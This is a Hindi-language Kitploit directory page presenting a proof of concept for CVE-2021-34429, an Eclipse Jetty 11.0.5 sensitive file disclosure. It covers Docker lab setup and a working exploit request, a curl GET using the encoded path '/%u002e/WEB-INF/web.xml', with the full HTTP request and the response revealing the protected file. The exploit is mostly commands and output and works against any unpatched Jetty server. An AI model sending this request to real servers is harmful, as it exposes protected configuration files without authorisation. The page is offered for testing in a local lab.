Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-34429 — POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure | Kitploit
उपकरण/GitHubGitHub/coldfusionx/cve-2021-34429
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityMisconfiguration
GitHubcoldfusionx/cve-2021-34429

CVE-2021-34429

POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure

रिपॉजिटरी देखें
624 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-34429

CVE-2021-34429 के लिए POC - Eclipse Jetty 11.0.5 संवेदनशील फ़ाइल प्रकटीकरण

WEB-INF निर्देशिका के अंदर फ़ाइलों तक पहुँचने के लिए एन्कोडेड URI का उपयोग करना

परीक्षण वातावरण की स्थापना

पूर्वापेक्षाएँ: अपने सिस्टम पर docker और docker-compose स्थापित करना

Debian-आधारित डिस्ट्रोस के लिए जैसे Ubuntu, Kali Linux आदि, निम्नलिखित कमांड का उपयोग करें

root@kitploit:~
apt install docker.io
apt install docker-compose

Windows, Mac और अन्य डिस्ट्रोस के लिए कृपया निम्नलिखित गाइड देखें:

  • https://docs.docker.com/engine/install/
  • https://docs.docker.com/compose/install/

Eclipse Jetty 11.0.5 स्थापित करना

  • रिपॉजिटरी को क्लोन या डाउनलोड करें
  • docker-compose up -d चलाएँ
  • आपका वेबसर्वर http://localhost:8080/ पर चालू और चल रहा होना चाहिए

होम

भेद्यता परीक्षण

http://localhost:8080/%u002e/WEB-INF/web.xml पर GET अनुरोध करें

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

अनुरोध

root@kitploit:~
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

प्रतिक्रिया

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

संदर्भ:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-34429
  • https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
टूल डाउनलोड करें